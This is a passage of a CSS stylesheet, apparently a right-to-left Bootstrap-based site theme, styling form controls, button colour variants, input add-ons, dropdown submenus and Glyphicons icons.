  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  border-color: #468847;
  background-color: #dff0d8;
}
.form-control-static {
  margin-bottom: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #c7c7c7;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline select.form-control {
    width: auto;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    padding-right: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
    margin-right: 0;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-right: -15px;
  margin-left: -15px;
}
.form-horizontal .form-group:before,
.form-horizontal .form-group:after {
  content: " ";
  display: table;
}
.form-horizontal .form-group:after {
  clear: both;
}
.form-horizontal .form-group:before,
.form-horizontal .form-group:after {
  content: " ";
  display: table;
}
.form-horizontal .form-group:after {
  clear: both;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    text-align: left;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  vertical-align: middle;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  white-space: nowrap;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  border-radius: 4px;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  -o-user-select: none;
  user-select: none;
}
.btn:focus {
  outline: thin dotted;
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus {
  color: #ffffff;
  text-decoration: none;
}
.btn:active,
.btn.active {
  outline: 0;
  background-image: none;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  pointer-events: none;
  opacity: 0.65;
  filter: alpha(opacity=65);
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-default {
  color: #ffffff;
  background-color: #2d2d2d;
  border-color: #1f1f1f;
}
.btn-default:hover,
.btn-default:focus,
.btn-default:active,
.btn-default.active,
.open .dropdown-toggle.btn-default {
  color: #ffffff;
  background-color: #191919;
  border-color: #000000;
}
.btn-default:active,
.btn-default.active,
.open .dropdown-toggle.btn-default {
  background-image: none;
}
.btn-default.disabled,
.btn-default[disabled],
fieldset[disabled] .btn-default,
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled:active,
.btn-default[disabled]:active,
fieldset[disabled] .btn-default:active,
.btn-default.disabled.active,
.btn-default[disabled].active,
fieldset[disabled] .btn-default.active {
  background-color: #2d2d2d;
  border-color: #1f1f1f;
}
.btn-default .badge {
  color: #2d2d2d;
  background-color: #fff;
}
.btn-primary {
  color: #ffffff;
  background-color: #0077bb;
  border-color: #0067a2;
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary:active,
.btn-primary.active,
.open .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #005d92;
  border-color: #004064;
}
.btn-primary:active,
.btn-primary.active,
.open .dropdown-toggle.btn-primary {
  background-image: none;
}
.btn-primary.disabled,
.btn-primary[disabled],
fieldset[disabled] .btn-primary,
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled:active,
.btn-primary[disabled]:active,
fieldset[disabled] .btn-primary:active,
.btn-primary.disabled.active,
.btn-primary[disabled].active,
fieldset[disabled] .btn-primary.active {
  background-color: #0077bb;
  border-color: #0067a2;
}
.btn-primary .badge {
  color: #0077bb;
  background-color: #fff;
}
.btn-warning {
  color: #ffffff;
  background-color: #f0ad4e;
  border-color: #eea236;
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning:active,
.btn-warning.active,
.open .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #ed9c28;
  border-color: #d58512;
}
.btn-warning:active,
.btn-warning.active,
.open .dropdown-toggle.btn-warning {
  background-image: none;
}
.btn-warning.disabled,
.btn-warning[disabled],
fieldset[disabled] .btn-warning,
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled:active,
.btn-warning[disabled]:active,
fieldset[disabled] .btn-warning:active,
.btn-warning.disabled.active,
.btn-warning[disabled].active,
fieldset[disabled] .btn-warning.active {
  background-color: #f0ad4e;
  border-color: #eea236;
}
.btn-warning .badge {
  color: #f0ad4e;
  background-color: #fff;
}
.btn-danger {
  color: #ffffff;
  background-color: #d9534f;
  border-color: #d43f3a;
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger:active,
.btn-danger.active,
.open .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #d2322d;
  border-color: #ac2925;
}
.btn-danger:active,
.btn-danger.active,
.open .dropdown-toggle.btn-danger {
  background-image: none;
}
.btn-danger.disabled,
.btn-danger[disabled],
fieldset[disabled] .btn-danger,
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled:active,
.btn-danger[disabled]:active,
fieldset[disabled] .btn-danger:active,
.btn-danger.disabled.active,
.btn-danger[disabled].active,
fieldset[disabled] .btn-danger.active {
  background-color: #d9534f;
  border-color: #d43f3a;
}
.btn-danger .badge {
  color: #d9534f;
  background-color: #fff;
}
.btn-success {
  color: #ffffff;
  background-color: #5cb85c;
  border-color: #4cae4c;
}
.btn-success:hover,
.btn-success:focus,
.btn-success:active,
.btn-success.active,
.open .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #47a447;
  border-color: #398439;
}
.btn-success:active,
.btn-success.active,
.open .dropdown-toggle.btn-success {
  background-image: none;
}
.btn-success.disabled,
.btn-success[disabled],
fieldset[disabled] .btn-success,
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled:active,
.btn-success[disabled]:active,
fieldset[disabled] .btn-success:active,
.btn-success.disabled.active,
.btn-success[disabled].active,
fieldset[disabled] .btn-success.active {
  background-color: #5cb85c;
  border-color: #4cae4c;
}
.btn-success .badge {
  color: #5cb85c;
  background-color: #fff;
}
.btn-info {
  color: #ffffff;
  background-color: #5bc0de;
  border-color: #46b8da;
}
.btn-info:hover,
.btn-info:focus,
.btn-info:active,
.btn-info.active,
.open .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #39b3d7;
  border-color: #269abc;
}
.btn-info:active,
.btn-info.active,
.open .dropdown-toggle.btn-info {
  background-image: none;
}
.btn-info.disabled,
.btn-info[disabled],
fieldset[disabled] .btn-info,
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled:active,
.btn-info[disabled]:active,
fieldset[disabled] .btn-info:active,
.btn-info.disabled.active,
.btn-info[disabled].active,
fieldset[disabled] .btn-info.active {
  background-color: #5bc0de;
  border-color: #46b8da;
}
.btn-info .badge {
  color: #5bc0de;
  background-color: #fff;
}
.btn-link {
  color: #ffffff;
  font-weight: normal;
  cursor: pointer;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #d9d9d9;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #5a5a5a;
  text-decoration: none;
}
.btn-lg {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 6px;
}
.btn-sm {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
.btn-xs {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 3px;
}
.btn-block {
  display: block;
  width: 100%;
  padding-right: 0;
  padding-left: 0;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}

select,
textarea,
input[type="text"],
input[type="password"],
input[type="datetime"],
input[type="datetime-local"],
input[type="date"],
input[type="month"],
input[type="time"],
input[type="week"],
input[type="number"],
input[type="email"],
input[type="url"],
input[type="search"],
input[type="tel"],
input[type="color"],
.inputbox {
  display: block;
  width: 100%;
  height: 34px;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.428571429;
  color: #4b4b4b;
  vertical-align: middle;
  background-color: #2d2d2d;
  background-image: none;
  border: 1px solid #1f1f1f;
  border-radius: 4px;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select:-moz-placeholder,
textarea:-moz-placeholder,
input[type="text"]:-moz-placeholder,
input[type="password"]:-moz-placeholder,
input[type="datetime"]:-moz-placeholder,
input[type="datetime-local"]:-moz-placeholder,
input[type="date"]:-moz-placeholder,
input[type="month"]:-moz-placeholder,
input[type="time"]:-moz-placeholder,
input[type="week"]:-moz-placeholder,
input[type="number"]:-moz-placeholder,
input[type="email"]:-moz-placeholder,
input[type="url"]:-moz-placeholder,
input[type="search"]:-moz-placeholder,
input[type="tel"]:-moz-placeholder,
input[type="color"]:-moz-placeholder,
.inputbox:-moz-placeholder {
  color: #5a5a5a;
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #5a5a5a;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #5a5a5a;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #5a5a5a;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #878787;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
select:focus,
textarea:focus,
input[type="text"]:focus,
input[type="password"]:focus,
input[type="datetime"]:focus,
input[type="datetime-local"]:focus,
input[type="date"]:focus,
input[type="month"]:focus,
input[type="time"]:focus,
input[type="week"]:focus,
input[type="number"]:focus,
input[type="email"]:focus,
input[type="url"]:focus,
input[type="search"]:focus,
input[type="tel"]:focus,
input[type="color"]:focus,
.inputbox:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(102, 175, 233, 0.6);
}
select:-moz-placeholder,
textarea:-moz-placeholder,
input[type="text"]:-moz-placeholder,
input[type="password"]:-moz-placeholder,
input[type="datetime"]:-moz-placeholder,
input[type="datetime-local"]:-moz-placeholder,
input[type="date"]:-moz-placeholder,
input[type="month"]:-moz-placeholder,
input[type="time"]:-moz-placeholder,
input[type="week"]:-moz-placeholder,
input[type="number"]:-moz-placeholder,
input[type="email"]:-moz-placeholder,
input[type="url"]:-moz-placeholder,
input[type="search"]:-moz-placeholder,
input[type="tel"]:-moz-placeholder,
input[type="color"]:-moz-placeholder,
.inputbox:-moz-placeholder {
  color: #5a5a5a;
}
select::-moz-placeholder,
textarea::-moz-placeholder,
input[type="text"]::-moz-placeholder,
input[type="password"]::-moz-placeholder,
input[type="datetime"]::-moz-placeholder,
input[type="datetime-local"]::-moz-placeholder,
input[type="date"]::-moz-placeholder,
input[type="month"]::-moz-placeholder,
input[type="time"]::-moz-placeholder,
input[type="week"]::-moz-placeholder,
input[type="number"]::-moz-placeholder,
input[type="email"]::-moz-placeholder,
input[type="url"]::-moz-placeholder,
input[type="search"]::-moz-placeholder,
input[type="tel"]::-moz-placeholder,
input[type="color"]::-moz-placeholder,
.inputbox::-moz-placeholder {
  color: #5a5a5a;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #5a5a5a;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #5a5a5a;
}
select[disabled],
textarea[disabled],
input[type="text"][disabled],
input[type="password"][disabled],
input[type="datetime"][disabled],
input[type="datetime-local"][disabled],
input[type="date"][disabled],
input[type="month"][disabled],
input[type="time"][disabled],
input[type="week"][disabled],
input[type="number"][disabled],
input[type="email"][disabled],
input[type="url"][disabled],
input[type="search"][disabled],
input[type="tel"][disabled],
input[type="color"][disabled],
.inputbox[disabled],
select[readonly],
textarea[readonly],
input[type="text"][readonly],
input[type="password"][readonly],
input[type="datetime"][readonly],
input[type="datetime-local"][readonly],
input[type="date"][readonly],
input[type="month"][readonly],
input[type="time"][readonly],
input[type="week"][readonly],
input[type="number"][readonly],
input[type="email"][readonly],
input[type="url"][readonly],
input[type="search"][readonly],
input[type="tel"][readonly],
input[type="color"][readonly],
.inputbox[readonly],
fieldset[disabled] select,
fieldset[disabled] textarea,
fieldset[disabled] input[type="text"],
fieldset[disabled] input[type="password"],
fieldset[disabled] input[type="datetime"],
fieldset[disabled] input[type="datetime-local"],
fieldset[disabled] input[type="date"],
fieldset[disabled] input[type="month"],
fieldset[disabled] input[type="time"],
fieldset[disabled] input[type="week"],
fieldset[disabled] input[type="number"],
fieldset[disabled] input[type="email"],
fieldset[disabled] input[type="url"],
fieldset[disabled] input[type="search"],
fieldset[disabled] input[type="tel"],
fieldset[disabled] input[type="color"],
fieldset[disabled] .inputbox {
  cursor: not-allowed;
  background-color: #878787;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-left: 5px;
}
.input-mini {
  width: 60px;
}
.input-small {
  width: 90px;
}
.input-medium {
  width: 150px;
}
.input-large {
  width: 210px;
}
.input-xlarge {
  width: 270px;
}
.input-xxlarge {
  width: 530px;
}
@media (min-width: 768px) {
  .form-inline .inputbox,
  .form-inline select,
  .form-inline textarea,
  .form-inline input {
    display: inline-block;
  }
}
.control-group {
  margin-bottom: 10px;
}
legend + .control-group {
  margin-top: 20px;
  -webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
  margin-bottom: 20px;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
  content: " ";
  display: table;
}
.form-horizontal .control-group:after {
  clear: both;
}
.form-horizontal .control-group .control-label {
  display: block;
  width: 100%;
}
@media (min-width: 768px) {
  .form-horizontal .control-group .control-label {
    display: inline-block;
    float: right;
    width: 160px;
    padding-top: 5px;
    text-align: left;
  }
}
.form-horizontal .control-group .controls {
  margin-right: 180px;
}
.form-actions {
  padding: 20px;
  margin: 20px 0;
  background-color: #878787;
  border-radius: 4px;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions:before,
.form-actions:after {
  content: " ";
  display: table;
}
.form-actions:after {
  clear: both;
}
.form-actions [class*="col-sm-offset-"],
.form-actions [class*="col-md-offset-"] {
  padding-right: 5px !important;
}
.input-append,
.input-prepend {
  display: inline-block;
  margin-bottom: 10px;
  vertical-align: middle;
  font-size: 0;
  white-space: nowrap;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input,
.input-append .dropdown-menu,
.input-prepend .dropdown-menu,
.input-append .popover,
.input-prepend .popover {
  font-size: 14px;
}
.input-append input,
.input-prepend input,
.input-append select,
.input-prepend select,
.input-append .uneditable-input,
.input-prepend .uneditable-input {
  position: relative;
  margin-bottom: 0;
  *margin-right: 0;
  vertical-align: top;
  border-radius: 4px 0 0 4px;
}
.input-append input:focus,
.input-prepend input:focus,
.input-append select:focus,
.input-prepend select:focus,
.input-append .uneditable-input:focus,
.input-prepend .uneditable-input:focus {
  z-index: 2;
}
.input-append .add-on,
.input-prepend .add-on {
  display: inline-block;
  width: auto;
  height: 34px;
  min-width: 16px;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: normal;
  line-height: 1.428571429;
  text-align: center;
  background-color: #878787;
  border: 1px solid #ccc;
}
.input-append .add-on,
.input-prepend .add-on,
.input-append .btn,
.input-prepend .btn,
.input-append .btn-group > .dropdown-toggle,
.input-prepend .btn-group > .dropdown-toggle {
  vertical-align: top;
  border-radius: 0;
}
.input-append .active,
.input-prepend .active {
  background-color: #bbff33;
  border-color: #669900;
}
.input-prepend .add-on,
.input-prepend .btn {
  margin-left: -1px;
}
.input-prepend .add-on:first-child,
.input-prepend .btn:first-child {
  border-radius: 0 4px 4px 0;
}
.input-append input,
.input-append select,
.input-append .uneditable-input {
  border-radius: 0 4px 4px 0;
}
.input-append input + .btn-group .btn:last-child,
.input-append select + .btn-group .btn:last-child,
.input-append .uneditable-input + .btn-group .btn:last-child {
  border-radius: 4px 0 0 4px;
}
.input-append .add-on,
.input-append .btn,
.input-append .btn-group {
  margin-right: -1px;
}
.input-append .add-on:last-child,
.input-append .btn:last-child,
.input-append .btn-group:last-child > .dropdown-toggle {
  border-radius: 4px 0 0 4px;
}
.input-prepend.input-append input,
.input-prepend.input-append select,
.input-prepend.input-append .uneditable-input {
  border-radius: 0;
}
.input-prepend.input-append input + .btn-group .btn,
.input-prepend.input-append select + .btn-group .btn,
.input-prepend.input-append .uneditable-input + .btn-group .btn {
  border-radius: 4px 0 0 4px;
}
.input-prepend.input-append .add-on:first-child,
.input-prepend.input-append .btn:first-child {
  margin-left: -1px;
  border-radius: 0 4px 4px 0;
}
.input-prepend.input-append .add-on:last-child,
.input-prepend.input-append .btn:last-child {
  margin-right: -1px;
  border-radius: 4px 0 0 4px;
}
.input-prepend.input-append .btn-group:first-child {
  margin-right: 0;
}
.btn-large {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 6px;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
  margin-top: 4px;
}
.btn-small {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 3px;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
  margin-top: 0;
}
.btn-mini {
  padding: 2px 4px;
  font-size: 12px;
  border-radius: 3px;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
  margin-top: -1px;
}

.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu:hover > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 4px;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu:hover > a:after {
  border-right-color: #ffffff;
}
.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition: height 0.35s ease;
  transition: height 0.35s ease;
}
@font-face {
  font-family: 'Glyphicons Halflings';
  src: url('../fonts/glyphicons-halflings-regular.eot');
  src: url('../fonts/glyphicons-halflings-regular.eot?#iefix') format('embedded-opentype'), url('../fonts/glyphicons-halflings-regular.woff') format('woff'), url('../fonts/glyphicons-halflings-regular.ttf') format('truetype'), url('../fonts/glyphicons-halflings-regular.svg#glyphicons-halflingsregular') format('svg');
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: 'Glyphicons Halflings';
  font-style: normal;
  font-weight: normal;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon:empty {
  width: 1em;
}
.glyphicon-asterisk:before {
  content: "\2a";
}
.glyphicon-plus:before {
  content: "\2b";
}
.glyphicon-euro:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
